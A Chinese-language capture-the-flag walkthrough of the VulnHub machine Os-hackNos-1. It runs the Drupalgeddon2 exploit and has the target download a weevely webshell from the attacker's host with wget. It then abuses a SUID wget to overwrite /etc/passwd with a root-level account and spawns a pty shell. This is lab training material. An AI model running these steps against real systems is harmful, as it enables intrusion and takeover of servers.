Os-hackNos-1
一、环境搭建实验主机:kali-linux 2023 虚拟机(VM)
实验靶机:Os-hackNos-1 靶机(VM)
实验网络:桥接模式
flag:1.平凡用户的user.txt;2.root用户的user.txt
技能:漏洞利用 | web应用 | 暴力破解 | 权限提升
靶机下载:https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
二、信息收集
主机发现:
[*]确认自己的信息
1 ifconfighttps://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328171138080-1633620198.png
[*]探测网段存活主机
1 nmap -sP 192.168.133.0/24https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328171059393-1409937809.png
[*]也可以利用如下命令
1 netdiscover -i eth0 -r 192.168.133.0/24https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328171615095-1975571855.png
端口扫描:
[*]探测操作体系及软件版本信息
1 nmap -sTV -p- -Pn 192.168.133.97https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328171831596-1451692011.png
[*]经过探测发现开放22端口和80端口
1 22 端口 :SSH 服务端口,可能存在弱口令和暴力破解
2 80 端口 :HTTP 端口,可以通过目录扫描,去发现网站目录或者网站源码泄露或者备份文件泄露
[*]访问一下80端口
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328172402638-1883642831.png
目录探测:
[*]探测一下网站目录信息
1 dirb http://192.168.133.97https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328172845995-429900113.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328173559010-1288915481.png
[*]可以看到网站CMS为drupal7,存在远程代码实行的漏洞,利用kali的msf模块,搜刮drupal对应的exp
三、漏洞发现
[*]CMS版本为drupal7,搜刮一下关于该版本的CMS漏洞
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328174223426-399782081.png
四、漏洞利用
1 将脚本拷贝下来
2 git clone https://github.com/dreadlocked/Drupalgeddon2.git
3
4 在运行脚本前,需要预装依赖包 highline
5 gem install highline
6
7 执行脚本
8 ruby drupalgeddon2.rb http://192.168.133.97/drupal/https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328190001395-1478360794.png
[*]查看权限
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328190201427-256057176.png
[*]查看目录文件
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328190348938-152861403.png
五、权限提升
利用weevely(kali 菜刀)
[*]利用weevely 天生木马,再将木马上传到靶机上
1 生成木马:
2 weevely generate hello ./door.php
3
4 打开kali web服务器:
5 python -m http.server 80
6
7 在靶机上使用wget工具下载 kali 上生成的木马文件:
8 wget http://192.168.133.125:80/door.phphttps://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328191010530-1927314758.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328191715417-1701042553.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328191759651-1127529049.png
[*]利用weevely天生的木马内容
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328191932211-1541740117.png
[*]连接靶机,留意此处权限和路径问题会导致连接失败
1 weevely http://192.168.133.97/drupal/door.php hellohttps://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328201348688-541606015.png
浏览用户目录
[*]查看是否存在有用的信息
1 cd /home
2 ls -lh
3 cd james/
4 ls -lh
5 cat user.txthttps://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328203238169-2003962505.png
[*]在 james 用户目录下发现一串MD5哈希值,解码失败
1 bae11ce4f67af91fa58576c1da2aad4b
[*]浏览一下网站根目录,发现其他文件
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328203918242-1934118360.png
[*]解码之后再次利用Brainfuck解码
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328204111425-754405351.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328204352823-1310396119.png
[*]得到:james:Hacker@4514
切换用户
[*]尝试切换用户,发现不能切换用户
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328205013085-1940862162.png
suid 提权
[*]检查哪些命令具有suid权限(具有suid权限的命令可以以文件拥有者的权限实行)
1audit_suidsgid -only-suid /https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328205204934-1153357383.png
[*]看到拥有wget的权限,这里的思路是把/etc/passwd的文件下载下来,然后添加一个具有root权限的用户,再传回去覆盖它。首先进行创建一个用户
1 openssl passwd -1 -salt 账号 密码https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328210009331-1693012093.png
[*]搭建web服务器,把靶机上的/etc/passwd下载下来
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328210602567-702714036.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328210659969-1135045537.png
[*]然后将刚才创建的用户加入进去,并在kali上开一个web服务器,用靶机连接下载已经更改的/ect/passwd去覆盖掉原来的文件即可
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328211043861-1085530943.png
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328212047794-1094304995.png
[*]然后查看靶机上是否有新增账户,发现lxx账号信息即创建乐成
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328212141689-131125586.png
[*]切换失败,此方法行不通
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328213330338-1641233842.png
利用metasploit
[*]搜刮漏洞组件
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328225632324-1207015330.png
[*]选择利用的工具模块,并设置相关参数
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328230008850-454329146.png
[*]查看设置参数
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328230110103-1333180377.png
[*]攻击乐成后,表现没有交互式shell,需要提升为交互式shell
1 python3 -c "import pty;pty.spawn('/bin/bash')"https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328230511053-1525540710.png
[*] 得到权限后切换用户,再次失败
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328231201789-1800020994.png
错误总结
[*]最终结合经验发现,写入新建的账户有问题,即覆盖的root权限的用户创建失败
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328232747905-1632171459.png
[*]更改为admin账户后,在metasploit得到权限后即可切换用户
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328232942579-964686817.png
[*]末了进入/root 目录下查看root.txt 完成测试
https://img2024.cnblogs.com/blog/3216597/202403/3216597-20240328233041357-2074876574.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]